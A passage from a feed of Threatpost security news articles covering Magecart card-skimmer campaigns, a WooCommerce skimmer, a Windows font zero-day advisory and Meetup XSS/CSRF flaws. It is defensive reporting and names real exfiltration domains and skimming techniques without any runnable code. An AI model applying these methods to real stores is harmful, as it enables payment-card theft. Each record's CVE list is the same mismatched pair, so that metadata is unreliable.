across](<https://twitter.com/MBThreatIntel/status/1215693928764063744>) the Magecart script, named \u201cATMZOW\u201d after one of the strings in the code, stealing form data from the checkout page of the site. This included the payment-card data itself (name on card, number, expiry and CVV) as well as additional personal information such as name and billing address.\n\nJ\u00e9r\u00f4me Segura, director of threat intelligence at Malwarebytes, told Threatpost that this particular script uses typical obfuscation but also has some anti-debugging tricks. It infected the site via its e-commerce platform, which he said hadn\u2019t been patched or updated in a while.\n\n\u201cThe compromised site is running Magento, by far the most targeted CMS when it comes to skimming, and was outdated, which is likely how the attackers were able to inject it with malware,\u201d he said in an email interview. \u201cWe don\u2019t believe this site was targeted on its own, but rather was victim of an automated attack based on exploiting known vulnerabilities. This reinforces the idea that any site, big or small, business or not for profit, is a valuable resource for criminals.\u201d\n\nSegura declined to name the affected site (but said that it was informed of the problem and that the malicious code \u201chas been removed from the site as we speak\u201d). 
However, researchers traced the skimmer back to its control panel, a known exfiltration domain at vamberlo[.]com.\n\n\u201cThe same ATMZOW script had already been injected into dozens of other websites before this one and using the same exfiltration domain as well,\u201d Segura told Threatpost.\n\nTroy Mursch of Bad Packets Report said [via tweet](<https://twitter.com/bad_packets/status/1215726048769273856>) that the PublicWWW tool indeed shows that ATMZOW is active on 39 other websites, and posted a screenshot:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/14151505/magecart-sites.png>)\n\n[Magecart](<https://threatpost.com/magecart-blue-bear-attack/151585/>) is an umbrella term encompassing several different threat groups who typically use the same modus operandi. They compromise websites by exploiting vulnerabilities in third-party e-commerce platforms, in order to inject card-skimming scripts on checkout pages.\n\nAt Virus Bulletin last October, researchers at RiskIQ said that Magecart is now so ubiquitous that its infrastructure [is flooding the internet](<https://threatpost.com/magecart-infestations-saturate-web/148911/>). There are at least 570+ known command-and-control (C2) domains for the group, with close to 10,000 hosts actively loading those domains, researchers said.\n\nEven so, Segura told Threatpost that this could be the tip of the iceberg.\n\n\u201cClient-side web skimmers have become well documented over the past couple of years,\u201d he said. \u201cHowever, what we read about is probably only a small fraction of the total number of active compromises. In particular, we rarely ever hear about skimmers that work server-side because only very few companies/researchers are able to get visibility into these breaches.\u201d\n\n_**Concerned about mobile security? 
**_[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) _**Top 8 Best Practices for Mobile App Security**__**, on Jan. 22 at 2 p.m. ET. **_**_Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts to discuss the secrets of building a secure mobile strategy, one app at a time._** [_**Click here to register**_](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)_**.**_\n", "cvss3": {}, "published": "2020-01-14T20:39:35", "type": "threatpost", "title": "Card Skimmer Hits Australian Bushfire Donation Site", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-14T20:39:35", "id": "THREATPOST:91C088C13F7384C96414B2C00FAF909B", "href": "https://threatpost.com/card-skimmer-australian-bushfire-donation-site/151841/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:17:10", "description": "Since its launch three years ago, the Keeper threat group has compromised more than 570 e-commerce websites, from online liquor stores to Apple product resellers. And experts warn of future, increasingly sophisticated attacks against online merchants worldwide.\n\nThe Keeper group, a faction of the [Magecart umbrella](<https://threatpost.com/tag/magecart/>), consists of an interconnected network of 64 attacker domains and 73 exfiltration domains. 
Researchers recently uncovered an unsecured access log on the Keeper control panel harboring 184,000 compromised payment cards, which had time stamps that ranged from July 2018 to April 2019.\n\n\u201cExtrapolating the number of cards per nine months to Keeper\u2019s overall lifespan, and given the dark-web median price of $10 per compromised card-not-present (CNP) card, this group has likely generated upwards of $7 million USD from selling compromised payment cards,\u201d according to [new research](<https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/>) from Gemini Advisory on Tuesday.\n\nAs is common for [Magecart groups](<https://threatpost.com/magecart-groups-attack-simultaneous-sites-in-card-theft-frenzy/149872/>), Keeper attackers launched attacks by breaking into online store backends, altering their source code and inserting malicious scripts that log payment-card details entered by shoppers in checkout forms. Researchers say Keeper exfiltration and attacker domains use identical login panels and are all linked to the same dedicated server. This server hosts both the malicious payload and the exfiltrated data stolen from victim sites, they said.\n\n\u201cThe Gemini team has named this group \u2018Keeper\u2019 based on its repeated usage of a single domain called fileskeeper[.]org to inject malicious payment card-stealing JavaScript (JS) into the website\u2019s HTML code, as well as receive compromised card data,\u201d said researchers.\n\n## **Victimology**\n\nThe 570 victim e-commerce stores range from small boutique shops to top sites in the Alexa Global Rankings, receiving between 500,000 to 1 million visitors monthly. Examples include an India-based online jewelry store (ejohri[.]com), a U.S.-based premier wine and spirits seller (cwspirits[.]com) and an Indonesia-based Apple product reseller (ibox.co[.]id).\n\nAlso of note, more than 85 percent of the victim sites operated on the Magento CMS. Magento is known to be the [top target for Magecart attacks](<https://threatpost.com/magento-warns-upgrade-asap/150115/>), and has more than 250,000 users worldwide. Magento 1 reached [end-of-life last week](<https://threatpost.com/tuesdays-magento-1-eol-100k-online-stores/157000/>), with Adobe making a last-ditch effort to urge the 100,000 online stores still running the outdated version to migrate to Magento 2 or face potential targeting from Magecart and other threat groups. Other CMS platforms hit by Keeper\u2019s campaign included sites running WordPress (5.5 percent), Shopify (4.2 percent), BigCommerce (2 percent) and PrestaShop (0.5 percent).\n\nThese victims may have been \u201coperating on an outdated content management system (CMS), utilizing unpatched add-ons, or having administrators\u2019 credentials compromised through SQL injections,\u201d said researchers.\n\n## **Changing Tactics**\n\nResearchers warned that Keeper appears to be continually updating its tactics and techniques, helping it to skirt detection. For instance, one of the initial attacks launched in April 2017, against retailer dressedinwhite[.]com, utilized public obfuscation methods, which made it simple to decode. 
Starting in 2018, however, the threat actors began to use custom obfuscation methods, as seen in an attack against casterdepot[.]com, researchers said.\n\nA more recent campaign in 2019 against nomin[.]net also shows a modified script that appears to be much cleaner and more concise with no displayed line breaks, said researchers.\n\n\u201cThe Keeper group currently uses this format for its payloads and denotes specific payment card, billing address and additional information fields that it collects,\u201d researchers said.\n\nResearchers also warn that, as of mid-2020, Magecart attacks have become a daily occurrence for small to medium-sized e-commerce businesses, from [food sites](<https://threatpost.com/olympic-ticket-survival-sites-hit-by-cyberattack/152648/>) to [large retailers like Macy\u2019s](<https://threatpost.com/macys-data-breach-linked-to-magecart/150393/>). More recently, sophisticated hackers like [the Lazarus Group](<https://threatpost.com/lazarus-group-adds-magecart/157167/>) have started adding digital payment-card skimming to their repertoire [using Magecart code](<https://threatpost.com/8-city-gov-websites-magecart/156954/>). Researchers predict that in the future, Keeper will continue its attacks.\n\n\u201cBased on this pattern of successful Magecart attacks, Gemini assesses with high confidence that Keeper is likely to continue launching increasingly sophisticated attacks against online merchants across the world,\u201d they said.\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. 
ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-07-07T20:05:08", "type": "threatpost", "title": "Keeper Threat Group Rakes in $7M from Hundreds of Compromised E-Commerce Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-07-07T20:05:08", "id": "THREATPOST:507909D943303F221572F2B4F6F0CCAC", "href": "https://threatpost.com/keeper-threat-group-7m-e-commerce-sites/157235/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:21:40", "description": "Credit-card-stealing criminals have set their sights on the WordPress plugin known as WooCommerce, an e-tailer platform, with a JavaScript-based card-skimming malware.\n\nSucuri researcher Ben Martin recently investigated a skimmer attack lodged against a WooCommerce site and found that it differs from prior payment-card campaigns that have targeted WordPress-based e-commerce destinations \u2014 in that the malware doesn\u2019t just intercept payment information entered into the fields on a check-out page.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201c[Attacks on WooCommerce in the past have] typically been limited to modifications of payment details within the plugin settings,\u201d he explained in a [Thursday posting](<https://blog.sucuri.net/2020/04/analysis-of-a-wordpress-credit-card-swiper.html>). 
\u201cFor example, forwarding payments to the attacker\u2019s PayPal email instead of the legitimate website owner. Seeing a dedicated credit card swiping malware within WordPress is something fairly new.\u201d\n\n**Behind the Scenes**\n\nAfter scanning the infected website, where customers had complained of fraudulent transactions, nothing serious at first seemed amiss, Martin wrote. It took a deeper integrity check of the core files of the site in order to find the stealer.\n\nRather than simply injecting malicious, third-party code \u2013 the typical approach used by Magecart and other groups \u2013 the attackers in this case modified a normally benign JavaScript file that is intentionally used on the site.\n\n\u201cIt was lodged near the end of a jQuery file: ./wp-includes/js/jquery/jquery.js,\u201d the researcher explained, \u201cinserted before the ending jQuery.noConflict();.\u201d\n\nHe added, \u201cIt\u2019s not so easy to see. The fact that the malware lodged itself within an already existing and legitimate file makes it a bit harder to detect.\u201d\n\nThe part of the script used to actually harvest the card details was found in the \u201c./wp-includes/rest-api/class-wp-rest-api.php\u201d file, according to Martin. It behaves like other PHP malware, he said.\n\n\u201cAs is typical in PHP malware, several layers of encoding and concatenation are employed in an attempt to avoid detection and hide its core code from the average webmaster,\u201d he wrote.\n\nOnce it\u2019s scooped up the payment details, the malicious script saves both the payment-card numbers and CVV card security codes in plain text in the form of cookies. It then uses the legitimate file_put_contents function to collect them into two separate image files (a .PNG file and a JPEG). 
These are kept in the wp-content/uploads directory structure, the researcher said.\n\nIn his investigation, Martin found the image files to be empty of stolen data \u2013 suggesting that, potentially, \u201cthe malware had the ability to cover its own tracks and auto-cleared these files after the information had been acquired by the attackers,\u201d according to his writeup.\n\n**WordPress Skimmers: A Growing Trend**\n\nWhile well-known card-thieving groups [like Magecart](<https://threatpost.com/emerging-makeframe-skimmer-magecart-smbs/154374/>) typically target e-commerce sites that run on the [Magento platform](<https://threatpost.com/critical-flaws-magento-ecommerce-code-execution/152343/>), WooCommerce has recently become the [market leader](<https://barn2.co.uk/woocommerce-stats/>) for e-commerce platforms, Martin pointed out. And that has, naturally, piqued the attention of cybercriminals looking for new attack surfaces.\n\n\u201cWith WooCommerce recently overtaking all other ecommerce platforms in popularity it was only a matter of time before we started seeing attackers target this platform more frequently,\u201d he said.\n\nHe said that this was the first case of this kind of WordPress-targeted card-skimming malware that he came across, but that a handful more have appeared since, and that \u201cWordPress websites with e-commerce features and online transactions will almost certainly continue to be targeted going forward.\u201d\n\nGiven that attackers are able to compromise websites in any number of ways \u2014 exploiting a [known vulnerable plugin](<https://threatpost.com/wordpress-plugin-bug-popup-builder/153715/>), for instance, or via a [brute-forced admin account](<https://threatpost.com/hackers-using-brute-force-attacks-harvest-wordpress-sites-041513/77730/>) \u2013 a good approach to protecting WooCommerce and other WordPress-based websites from skimmers and other malware is to disable direct file editing for wp-admin, according to 
Martin.\n\n\u201cAdd the following line to your wp-config.php file: define( 'DISALLOW_FILE_EDIT', true );,\u201d he said. \u201cThis even prevents administrator users from being able to directly edit files from the wp-admin dashboard. In the event of a compromised admin account this can make the difference between the attacker delivering their payload or not.\u201d\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-10T21:37:37", "type": "threatpost", "title": "WooCommerce Falls to Fresh Card-Skimmer Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-04-10T21:37:37", "id": "THREATPOST:A8F8FF80F526883F7B2F0AB15005FF18", "href": "https://threatpost.com/woocommerce-card-skimmer-malware/154699/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:22:29", "description": "Microsoft is warning of critical zero-day flaws in its Windows operating system that could enable remote code execution. The unpatched flaws are being exploited by attackers in \u201climited, targeted\u201d attacks, the company said.\n\nAccording to Microsoft, two remote code execution vulnerabilities exist in the way that Windows\u2019 Adobe Type Manager Library handles certain fonts. Adobe Type Manager is a font management tool built into both Mac OS and Windows operating systems, and produced by Adobe. 
While no patches are available for the flaws, workaround mitigations can protect users.\n\n\u201cMicrosoft is aware of limited targeted attacks that could leverage unpatched vulnerabilities in the Adobe Type Manager Library, and is providing the following guidance to help reduce customer risk until the security update is released,\u201d according to a Monday Microsoft [security advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv200006#ID0EMGAC>).\n\nSpecifically, the flaw exists because the Windows version of Adobe Type Manager Library improperly handles a specially crafted multi-master font (called the Adobe Type 1 PostScript format). [Type 1 vector outline fonts](<https://www.adobe.com/products/type/adobe-type-references-tips/font-formats.html>) are a specialized form of PostScript (the worldwide printing and imaging standard), which contain instructions for building outlines from scalable lines and curves (filled to create the solid shapes of letters and other glyphs), according to Adobe.\n\n> Microsoft is aware of limited targeted attacks that could leverage unpatched vulnerabilities in the Adobe Type Manager Library, and is providing guidance to help reduce customer risk until the security update is released. See the link for more details. <https://t.co/tUNjkHNZ0N>\n> \n> \u2014 Security Response (@msftsecresponse) [March 23, 2020](<https://twitter.com/msftsecresponse/status/1242135309116043270?ref_src=twsrc%5Etfw>)\n\nThere are multiple ways an attacker could exploit the vulnerabilities, Microsoft said. For example, an attacker could convince a user to open a specially crafted document or view it in the Windows Preview pane. 
Windows Preview pane is used by the Windows Explorer (which is called File Explorer in Windows 10) file manager application to preview pictures, video, and other content.\n\nAll currently supported versions of Windows are affected, including Windows 10, as well as versions of Windows 7, Windows 8.1, Windows RT, Windows Server 2008, Windows Server 2012, Windows Server 2016 and Windows Server 2019 (a full list of affected versions can be [found in the advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv200006#ID0EUGAC>)). Windows 7 is also affected, though it has reached end of support, said Microsoft.\n\n**Workarounds**\n\nWhile no patches are available yet, Microsoft recommended a slew of mitigations and workarounds. That includes disabling the preview pane and details pane in Windows. Blocking this would mean that Windows Explorer (or File Explorer in Windows 10) will not automatically display OpenType fonts.\n\n\u201cDisabling the Preview and Details panes in Windows Explorer prevents the automatic display of OTF fonts in Windows Explorer,\u201d said Microsoft. \u201cWhile this prevents malicious files from being viewed in Windows Explorer, it does not prevent a local, authenticated user from running a specially crafted program to exploit this vulnerability.\u201d\n\nOther workarounds include disabling the WebClient service. 
Microsoft said that disabling this service blocks the Web Distributed Authoring and Versioning (WebDAV) client service, which is a \u201clikely remote attack vector.\u201d WebDAV is an HTTP extension that allows clients to perform remote Web content authoring operations.\n\n\u201cAfter applying this workaround it is still possible for remote attackers who successfully exploit this vulnerability to cause the system to run programs located on the targeted user\u2019s computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet,\u201d said Microsoft.\n\nAnother workaround is renaming ATMFD.DLL (the file name of Adobe Type Manager Font Driver), said Microsoft. The company also noted that for systems running supported versions of Windows 10, a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.\n\nMicrosoft said it is currently working on a fix and that a patch would likely come during its regularly scheduled Patch Tuesday updates (scheduled for April 14).\n\n\u201cUpdates that address security vulnerabilities in Microsoft software are typically released on Update Tuesday, the second Tuesday of each month,\u201d according to Microsoft. \u201cThis predictable schedule allows for partner quality assurance and IT planning, which helps maintain the Windows ecosystem as a reliable, secure choice for our customers.\u201d\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. 
This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduce reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-03-23T18:27:40", "type": "threatpost", "title": "Microsoft Warns of Critical Windows Zero-Day Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-03-23T18:27:40", "id": "THREATPOST:5D03069AA1C13F3368E88C9D30D3CC23", "href": "https://threatpost.com/microsoft-warns-of-critical-windows-zero-day-flaws/154040/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:15:55", "description": "Critical flaws in the [popular Meetup ](<https://threatpost.com/critical-meetup-website-flaws-takeover-payment-theft/157934/>)platform were revealed Monday as part of research unleashed at this week\u2019s [Black Hat USA 2020](<https://threatpost.com/black-hat-usa-def-con-28-go-virtual/155606/>). The flaws, which have been patched, enable the full takeover of Meetup \u201cGroups\u201d by threat actors, who could also redirect payments and carry out other malicious actions.\n\nErez Yalon, the director of security research with Checkmarx, discussed why these critical vulnerabilities are a \u201choly grail\u201d for attackers, and explained how the bugs are indicative of overall application security trends that will be discussed this week at Black Hat USA 2020. In the case of the Meetup flaws, the researcher identified two. 
One is a [cross site scripting flaw](<https://threatpost.com/wordpress-xss-drive-by-code-execution/148324/>) and the second a [cross site request forgery](<https://threatpost.com/ebay-vulnerable-to-account-hijacking-via-xsrf/103311/>) \u2013 both tied to the platform\u2019s application programming interface (API).\n\nBelow is an interview with Yalon conducted ahead of the research along with an accompanying transcript.\n\n[** Listen to the full interview below or at this link.**](<https://www.youtube.com/watch?v=M85zrOA59OE>)\n\n_Below find a lightly edited transcript of the interview._\n\n**Lindsey O\u2019Donnell Welch**: This is Lindsey O\u2019Donnell Welch with Threatpost and I am joined today by Erez Yalon, the director of security research with Checkmarx. And [we\u2019re talking during Black Hat USA 2020,](<https://threatpost.com/category/bh/>) where Checkmarx is announcing some new security research that they came out with. So Erez thank you so much for joining me today. It\u2019s nice to be talking to you even though this year, it\u2019s actually virtually instead of our in person interviews [that we\u2019ve done in the past.](<https://threatpost.com/black-hat-2019-news-wrap-best-worst/147223/>)\n\n**Erez Yalon**: Yeah, we usually do face to face but this is not allowed in the new normal. So this is how we do it now. But it\u2019s fine.\n\n**LO:** There\u2019s always Black Hat 2021. Now, during Black Hat 2020 Checkmarx\u2019s security research team has some new research that you are releasing, and that is specifically focused around Meetup.com. And for those who don\u2019t know, Meetup.com is a popular website that allows users to create an event for people, with similar interests to gather, so you know, book clubs or dog walking clubs, for instance. 
So Erez you found an array of kind of security issues in the investigations that you did \u2013 everything from API security issues to cross-site scripting and cross site request forgery flaws, can you kind of give us a rundown of the research and you know, what these different vulnerabilities were?\n\n**EY:** Sure. Okay, so basically looking at Meetup.com, we\u2019re not targeting specifically them. We\u2019re in general, looking at the websites that are high in demand and more interesting for everyone, for consumers and us as well. So Meetup was one in a long list. Now, it was part of our research about API security, which we invest a lot in these days. But actually the biggest issues we found were just good old application security issues.\n\nI think that they are probably among the top five famous vulnerabilities that can be found in appsec, application security. One of them is the [cross site scripting flaw](<https://threatpost.com/wordpress-xss-drive-by-code-execution/148324/>). And the other one is the [cross site request forgery](<https://threatpost.com/ebay-vulnerable-to-account-hijacking-via-xsrf/103311/>), also known as XSS and CSRF.\n\nWhen we started playing with Meetup, we found that one of their features or endpoints is not totally sanitizing \u2013 and by sanitizing I mean, removing bad inputs \u2013 not totally sanitizing the fields that are in the discussion field. Now, every Meetup group has a discussion board under the group. And it\u2019s, as far as I know, enabled by default. We didn\u2019t see any groups without it, I think it makes sense to allow discussions in the group.\n\nAnd the sanitization process there was not complete. And we managed to bypass it by adding some specific scripts and tags that bypassed the protection of the Meetup website. What it was is what we call stored XSS. Now, instead of a message or a discussion or a post on the page, we could have put some benign message actually in the background on a script. 
So this by itself is very bad already, because it means that in the context of a web browser, we can do whatever we want, now for every person who visits this discussion board, so it can be stealing information that is part of your web browsing process like cookies and sessions, and things like that. We can deface the website or even do some cryptomining on the web browser. So this, this actually lets us do many, many things. The interesting part was that we thought, okay, if it\u2019s a stored XSS, it means that that the organizers will probably fall into this hole as well as the XSS. So they might run some sort of script on their side, and we know that they have admin capabilities. So the next vulnerability we found was cross-site request forgery, CSRF, which means that essentially when the user is authenticated on the server, it means that if I have hold of the client side, which I do with XSS, I can run a lot of commands in the name of that user, and the user will not even be able to tell that the web browser actually sent these commands.\n\nSo just before I talk about specifically what we did here, I want to mention that the combination of XSS and CSRF is the holy grail for us, because when you manage to chain these two together, sometimes there are no limits to what can actually happen. So riding on the XSS will propel specific, malicious script that runs on the organizers\u2019 side, on the organizers\u2019 browser. And then by abusing the CSRF we\u2019ve caused the organizer to give permissions of a co-organizer to the attacker. So suddenly, we\u2019ve taken over the account completely and we have access to a lot of information \u2013 we can change the Meetup, we can cancel it, we can create a fake meetup, etc. So this actually was some sort of privilege escalation we created. And because we\u2019ll never be happy and we always want more. To top it all, we found a way also to, to play a bit with the payment details. 
So with Meetup you have a lot of options of collecting payments, sometimes it\u2019s just $1 or two for refreshments from each one and sometimes it\u2019s a paid session like $100 or $200. And we were able to \u2013 like we did with the privilege escalation I described we could actually redirect the payment to our own PayPal address. So our scene, when we imagined it, is an attacker changing all the payments of Meetup for like 24 hours, gathering all the all the money and running away. This is the scenario we imagined. And I think it was interesting \u2013 we did not try that \u2013 but as a as a theory, we could actually create a wall that would infect each user and each user would infect all the Meetup groups they are part of, etc., going on and on like that. This way we could have also reached private groups and groups that are not listed on Meetup. So all in all, it\u2019s kind of a critical issue, as you can understand.\n\n**LO:** For sure, I mean, that impact there of being able to redirect all payments to a PayPal account seems like it would definitely be a lucrative one for cyber criminals who are definitely motivated by money. So that could be a serious impact there. In terms of exploitability for these vulnerabilities. How serious are they? What would an attacker potentially need to, you know, carry out an actual attack here?\n\n**EY:** So the field that was not sanitized well, it was partially sanitized. So I believe that automatic hacking tools or testing tools that check for this would not find it, but we tend to be creative. So when we find something that seems not completely protected, we will find a crack together, so it was more of a manual thing than an automatic thing. But I think that every hacker that would have decided to do that would eventually probably find a way in. 
And as soon as you find the XSS, and then the next thing you do is to look for the CSRF, because as I said, they go together to reach the higher purpose of really doing some damage there.\n\n**LO:** Yeah. And what was the process of disclosure here? Because you guys reach out to meet up and I believe they have fixed everything. Is that correct?\n\n**EY:** Yeah, we never publish anything without getting confirmation from the vendor that they fixed everything. And the reason is that we don\u2019t want to put the users in any unnecessary risk obviously. So we reached out to Meetup. They fixed things, they talked to us, we helped them through the fix cycle. Trying to direct them to the right way to do that. And just recently, they got back to us and informed us that everything they meant to fix is fixed. And that\u2019s it. So now we\u2019re free to discuss that.\n\n**LO:** Great well, definitely some interesting research there. And now we have Black Hat this week, and what are some of kind of the top threats you expect to be discussed at the conference this year? And, I mean, they might be related to [COVID and the ongoing pandemic](<https://threatpost.com/working-from-home-covid-19s-constellation-of-security-challenges/153720/>) or [election security](<https://threatpost.com/election-security-threats-from-misinformation-to-voting-machine-flaws/147164/>). I mean, those are kind of the top ones I\u2019m expecting to see, but is there anything from your standpoint, having been observing what\u2019s been going on in the threat landscape over the past few months that you\u2019re really expecting to hear more about?\n\n**EY**: Yeah, so I think the trends would definitely dictate election security. And maybe also COVID, I\u2019m not sure it\u2019s been enough time to actually create some sort of presentation that will tell us a lot about that. I think it will be interesting to wait a bit into the future and see what happened. 
Although I\u2019m sure there are some people who can already discuss that. Another trend we can [probably expect to see is 5G](<https://threatpost.com/5g-and-iot-how-to-approach-the-security-implications/148681/>), all the talks around that, some of them targeting the actual technology, some of them the hype and the scared people around it. Regarding more technical aspects, I think that we saw a big trend of [moving towards API security](<https://threatpost.com/akamai-on-credential-stuffing-attacks/153654/>) in the past, we will probably see the bigger picture now. Everything that is what we call cloud-native, from containers to serverless to again, API security. And everything that is about this new architecture that is no longer a buzzword, it\u2019s actually what we see every day. And this is where modern architectural software is going. Obviously, it has a lot of pluses and a lot of things that make everything simpler to us. But security sometimes as we know, drags behind. So this is a good time to close the gap and make sure that security is also moving forward in the same piece of architecture and our cutting edge technology.\n\n**LO:** And to your point about 5G I certainly think that\u2019ll be a big topic as well, just with everything, starting to be rolled out and a lot of hype there over the past year or so. And I also wanted to ask you, I mean, you know, you\u2019ve been up in charge of the AppSec village in previous Black Hats. What can we expect there for this year, especially with everything being virtual?\n\n**EY:** Yeah, so AppSec village is part of DEF CON not Black Hat. And we started it last year. It was the first year and it was a great success; we had during DEF CON, which is directly after Black Hat, almost 5,000 visitors in our AppSec village, which is like a mini conference inside of a conference, which is talking mainly about application security, obviously. 
This year DEF CON moved to what they call safe mode, which is simply going virtual and we pivoted towards that as well. We weren\u2019t sure in the beginning because none of us had the experience of creating a virtual conference before. But we heard the community and everyone demanded to have another AppSec village this year. So we decided we were going to do that, together with my colleagues, friends and co-leaders. We managed to get a group of volunteers and got a lot of support from DEF CON themselves. And it\u2019s going to be virtual, everything is going to be through Discord with some recorded talks, some live talks, we\u2019re going to actually try to do workshops, virtually, it\u2019s going to be kind of challenging, but I think that people who are coming to DEF CON, are really anxious and really want to get their hands dirty, in a way. And we\u2019re going to have a nice competition of the Capture the Flag around the application security teams, and we\u2019re going to meet a lot of people it\u2019s going to be very, very interesting trying to make this new normal, somehow normal.\n\n**LO:** Right, yeah, well, you know, I\u2019m excited to see how that plays out. And I\u2019m sure that the interest is definitely there and there will be a lot of cool things coming out of that, so, Erez, thank you so much for coming on to talk a little bit more about your new research and what to expect over the next week.\n\n**EY:** My pleasure.\n\n**LO:** Great, and to all of our listeners. Thanks for listening in. If you liked what you heard or had any thoughts or questions, please comment below the video and be sure to subscribe. Thank you.\n", "cvss3": {}, "published": "2020-08-03T15:13:40", "type": "threatpost", "title": "Black Hat USA 2020: Critical Meetup.com Flaws Reveal Common AppSec Holes", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-03T15:13:40", "id": "THREATPOST:ED2B1571104341CFA35DF2C4172EB792", "href": "https://threatpost.com/black-hat-usa-2020-critical-meetup-com-flaws-reveal-common-appsec-holes/157950/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:07:55", "description": "Boom! Mobile\u2019s U.S. website recently fell victim to an e-commerce attack, putting online shoppers in danger of payment-card theft, researchers said.\n\nBoom! is a wireless provider that resells mobile phone plans from Verizon, AT&T and T-Mobile USA, under its own brand and with its own perks (the company boasts \u201cgreat customer service\u201d and no contracts). 
Up until yesterday, the provider\u2019s main website was hosting malicious code, which lurked on the online checkout page and harvested online shoppers\u2019 details.\n\nThe approach is reminiscent of core Magecart group attacks, but in this case, the attack was the work of the Fullz House group, a Magecart splinter group that\u2019s mainly known for its phishing prowess, according to Malwarebytes.\n\n\u201cMost victims of Magecart-based attacks tend to be typical online shops selling various goods. However, every now and again we come across different types of businesses which were affected simply because they happened to be vulnerable,\u201d Malwarebytes researchers said in a [Monday post](<https://blog.malwarebytes.com/malwarebytes-news/2020/10/mobile-network-operator-falls-into-the-hands-of-fullz-house-criminal-group/>).\n\nAccording to [a review](<https://sitecheck.sucuri.net/results/boom.us>) from Sucuri, boom[.]us was running PHP version 5.6.40, which reached end-of-life in January 2019. As of this writing, the website was still running the outdated version.\n\n\u201cThis may have been a point of entry but any other vulnerable plugin could also have been abused by attackers to inject malicious code into the website,\u201d researchers pointed out.\n\n## **The Attack**\n\nThe cybercriminals managed to inject malicious code into Boom!\u2019s web platform, researchers explained.\n\n\u201cOur crawlers recently detected that their website, boom[.]us, had been injected with a one-liner that contains a Base64 encoded URL loading an external JavaScript library,\u201d researchers wrote. \u201cOnce decoded, the URL loads a fake Google Analytics script from paypal-debit[.]com/cdn/ga.js. 
We quickly recognize this code as a credit-card skimmer that checks for input fields and then exfiltrates the data to the criminals.\u201d\n\nThe skimmer is highly detectable, because it exfiltrates data every time it detects a change in the fields displayed on the page \u2013 i.e., whenever someone types something in. As a result, it lacks stealth: \u201cFrom a network traffic point of view, you can see each leak as a single GET request where the data is Base64 encoded,\u201d explained the researchers.\n\nIn this case, both the exfiltration domain (hosted on Alibaba) and the injected code proved to be familiar; they have turned up in previous Fullz House incidents, including one where the threat actors were using decoy payment portals set up like phishing pages.\n\n## **Fullz House Back on the Schedule**\n\nThe group [has been analyzed](<https://threatpost.com/magecart-variant-tactics-mitm-phishing/150628/>) in the past, and gets its name from the use of carding sites to resell \u201cfullz,\u201d an underground slang term meaning a full set of an individual\u2019s personally identifying information plus financial data.\n\nFullz House was discovered ramping up activity starting in August-September of 2019. It uses a unique codebase and different tactics from the main Magecart variants to carry out its attacks, according to researchers.\n\n[Magecart](<https://threatpost.com/macys-data-breach-linked-to-magecart/150393/>) is an umbrella term encompassing several different threat groups who all use the same modus operandi: They compromise websites (mainly built on the Magento e-commerce platform) in order to inject card-skimming scripts on checkout pages, stealing unsuspecting customers\u2019 payment card details and other information entered into the fields on the page.\n\nAccording to a previous analysis from RiskIQ, Fullz House is known for innovating when it comes to the Magecart blueprint by adding phishing to the mix. 
